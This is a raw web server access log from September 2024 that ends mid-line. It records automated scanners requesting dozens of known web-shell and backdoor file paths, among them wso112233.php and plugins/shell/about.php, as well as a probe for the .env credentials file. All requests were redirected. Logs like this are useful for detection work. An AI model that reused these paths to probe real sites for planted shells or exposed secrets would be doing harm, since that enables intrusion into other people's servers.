192.145.125.92 - - [23/Sep/2024:02:45:38 +0700] "GET /pki-validation/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:38 +0700] "GET /Requests/Text/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:39 +0700] "GET /uploads/error_log.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:39 +0700] "GET /pomo/conf-php.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:39 +0700] "GET /SimplePie/Cache/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:40 +0700] "GET /wp-admin/config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:40 +0700] "GET /js/Files/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:40 +0700] "GET /upload_form.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:41 +0700] "GET /task.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:41 +0700] "GET /mu-plugins/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:42 +0700] "GET /bsbdoaro.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:42 +0700] "GET /plugins/ova-back.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:42 +0700] "GET /wp-includes/admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:45:43 +0700] "GET /uploads/wp-dbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:45:43 +0700] "GET /pki-validation/fierza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:43 +0700] "GET /wp-includes/classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:45:44 +0700] "GET /themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:44 +0700] "GET /plugins/revslider/includes/external/page/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:45:45 +0700] "GET /js/tinymce/wp-includes/js/tinymce/wp-tinymce.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:45 +0700] "GET /phpunit/phpunit/src/Util/PHP/wpx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:45 +0700] "GET /uploads/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:46 +0700] "GET /plugins/seoo/masfix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:46 +0700] "GET /css/common_configuration.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:46 +0700] "GET /plugins/shell/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:47 +0700] "GET /css/dist/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:45:47 +0700] "GET /uploads/2023/12/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:47 +0700] "GET /rest-api/class-wp-rest-core.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:48 +0700] "GET /odeobaim.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:48 +0700] "GET /widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:48 +0700] "GET /bx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:45:49 +0700] "GET /php-compat/wp-config-sample.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:49 +0700] "GET /IXR/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:50 +0700] "GET /maint/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:50 +0700] "GET /themes/twentytwentythree/patterns/web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:50 +0700] "GET /themes/rehub-theme/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:51 +0700] "GET /plugins/pwnd/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:51 +0700] "GET /wp-system.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:52 +0700] "GET /css/colors/blue/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:52 +0700] "GET /pki-validation/edit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:45:52 +0700] "GET /certificates/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:53 +0700] "GET /defaults.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:53 +0700] "GET /themes/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:53 +0700] "GET /wp-widgets.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:54 +0700] "GET /uploads/2018/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:54 +0700] "GET /ID3/wp-css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:54 +0700] "GET /Text/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:45:55 +0700] "GET /maint/wp-admin/maint/repair.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:55 +0700] "GET /controller/extension/wpm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:45:56 +0700] "GET /plugins/ioxi/ioxi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:56 +0700] "GET /ab.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:56 +0700] "GET /zoom_w.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:45:57 +0700] "GET /k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:57 +0700] "GET /js/tinymce/skins/lightgray/fonts/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:58 +0700] "GET /beez5/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:58 +0700] "GET /wp-includes/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:59 +0700] "GET /pomo/9876sd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:59 +0700] "GET /plugins/ubh/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:46:00 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:46:00 +0700] "GET /loginform.inc.php3 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:00 +0700] "GET /customize/class-wp-signdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:01 +0700] "GET /bin/test.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:01 +0700] "GET /js/widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:01 +0700] "GET /beez5/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:02 +0700] "GET /certificates/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:46:02 +0700] "GET /Requests/Utility/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:03 +0700] "GET /pki-validation/cloud1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:46:03 +0700] "GET /mari.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:46:04 +0700] "GET /wp-content/plugins/rex/l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:46:04 +0700] "GET /plugins/erin/yani/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:46:05 +0700] "GET /demo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:46:05 +0700] "GET /js/mediaelement/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:06 +0700] "GET /pki-validation/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:46:06 +0700] "GET /widgets/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:46:07 +0700] "GET /random_compat/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:07 +0700] "GET /images/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:08 +0700] "GET /languages/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:08 +0700] "GET /plugins/compat3x/css/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:08 +0700] "GET /pkivalidation/wso112233.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:46:09 +0700] "GET /maint/maint/ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:10 +0700] "GET /Text/Diff/Engine/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:46:10 +0700] "GET /themes/newstoday/lang.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:11 +0700] "GET /themes/gaukingo/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:46:11 +0700] "GET /plugins/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:46:11 +0700] "GET /0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 195.181.168.181 - - [23/Sep/2024:07:47:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 51.15.16.101 - - [23/Sep/2024:12:00:22 +0700] "POST /ss.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 45.94.211.87 - - [24/Sep/2024:03:42:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 34.41.23.244 - - [24/Sep/2024:03:45:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 54.158.129.118 - - [24/Sep/2024:07:07:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" 94.141.120.165 - - [24/Sep/2024:08:03:57 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 94.141.120.165 - - [24/Sep/2024:08:03:58 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 94.141.120.165 - - [24/Sep/2024:08:03:58 +0700] "POST / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 94.141.120.165 - - [24/Sep/2024:08:03:59 +0700] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 94.141.120.165 - - [24/Sep/2024:08:03:59 +0700] "POST / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 104.248.174.117 - - [24/Sep/2024:13:55:44 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 104.248.174.117 - - [24/Sep/2024:14:02:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 104.248.174.117 - - [24/Sep/2024:20:25:54 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:25:56 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:25:59 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:02 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:05 +0700] "GET /chosen.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:07 +0700] "GET /mah.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:10 +0700] "GET /wp-admin/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:13 +0700] "GET /wp-content/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:16 +0700] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:18 +0700] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:21 +0700] "GET /wp-content/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:24 +0700] "GET /wp-admin/user/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:27 +0700] "GET /wp-includes/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:30 +0700] "GET /wp-admin/images/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:32 +0700] "GET /wp-includes/Text/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:34 +0700] "GET /wp-admin/network/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - 